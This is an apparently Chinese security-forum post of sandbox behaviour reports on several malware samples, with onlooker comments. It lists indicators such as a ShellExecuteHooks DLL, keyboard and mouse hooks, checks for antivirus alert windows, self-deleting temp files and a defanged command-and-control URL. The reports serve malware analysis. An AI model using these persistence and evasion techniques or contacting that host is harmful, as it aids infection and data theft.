Creates value "{24909874-8982-F344-A322-7898787FA742}"="swjqbzc.dll" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks".

[ Changes to system settings ]
Modifies profile key "Url1"="699F838387CDD8D8808080D9879CC2C6C0C4D99499D890969A92D88F95D88F8F8FD9968487" in section [Send] of file C:\WINDOWS\Fonts\wijiafw.fon.
Modifies profile key "Url1"="hxxp://www.pk5173.cn/game/xb/xxx.asp" in section [Send] of file C:\WINDOWS\Fonts\swjqbcs.dll.
Creates Windows_Hook_monitoring _keyboard activity.
Creates Windows_Hook_monitoring _mouse activity.

[ Network ]
Hooks into Shell explorer.

[ Process-window information ]
Enumerates running processes.
Creates process "C:\WINDOWS\SYSTEM32\swjqbac.exe".
Enumerates running processes several parses....

3.exe
[ General_Information]
**Locates window "NULL [class AVP.AlertDialog]" on desktop.
**Locates window "NULL [class AVP.Product_Notification]" on desktop.
**Locates window "瑞星注册表监控提示 [class NULL]" on desktop.

[ Process-window information ]
Creates an event called 51343281.

4.exe
[ General_Information]
Drops files in %WINSYS% folder.
**Locates window "瑞星注册表监控提示 [class #32770]" on desktop.
**Locates window "IE 执行保护 [class #32770]" on desktop.
**Locates window "瑞星卡卡上网安全助手 - IE防漏墙 [class #32770]" on desktop.
**Locates window "NULL [class AVP.AlertDialog]" on desktop.
**Locates window "NULL [class AVP.Product_Notification]" on desktop.
**Locates window "NULL [class AVP.TrafficMonConnectionTerm]" on desktop.

[ Changes_to_filesystem ]
Creates directory C:\WINDOWS\system32\.
Creates file C:\WINDOWS\system32\kawdcaz.exe.
Creates file C:\WINDOWS\TEMP\tmp8099.tmp.
Deletes file C:\WINDOWS\TEMP\tmp8099.tmp.
Creates file C:\WINDOWS\TEMP\tmp8099.bat.
Deletes file C:\WINDOWS\TEMP\tmp8099.bat.

[ Process-window information ]
Enumerates running processes.

5.exe
[ General_Information]
**Locates window "NULL [class AVP.AlertDialog]" on desktop.
**Locates window "NULL [class AVP.Product_Notification]" on desktop.
**Locates window "瑞星注册表监控提示 [class NULL]" on desktop.

[ Process-window information ]
Creates an event called 15914244.
Enumerates running processes.

6.exe
[ General_Information]
**Locates window "NULL [class AVP.AlertDialog]" on desktop.
**Locates window "NULL [class AVP.Product_Notification]" on desktop.
**Locates window "瑞星注册表监控提示 [class NULL]" on desktop.

[ Process-window information ]
Creates an event called 68483277.

8.exe
[ General_Information]
**Locates window "NULL [class AVP.AlertDialog]" on desktop.
**Locates window "NULL [class AVP.Product_Notification]" on desktop.
**Locates window "瑞星注册表监控提示 [class NULL]" on desktop.

[ Process-window information ]
Creates an event called 96831784.

9.exe
[ General_Information]
**Locates window "NULL [class AVP.AlertDialog]" on desktop.
**Locates window "NULL [class AVP.Product_Notification]" on desktop.
**Locates window "瑞星注册表监控提示 [class NULL]" on desktop.

[ Process-window information ]
Creates an event called 66971835.

不可一世 · 发表于 2012-6-17 08:38

，门外汉看的大汗直流啊，楼主高手啊。

O_o · 发表于 2012-6-17 12:32

无法学习，只能围观。

wsdtczzt · 发表于 2012-6-18 18:11

小菜鸟默默路过。。

1354669803 · 发表于 2012-6-18 18:20

难道老师爆掉了ASP吗

帐号		自动登录	找回密码
密码			注册[Register]

[转载] 千里寻马挖掘送样本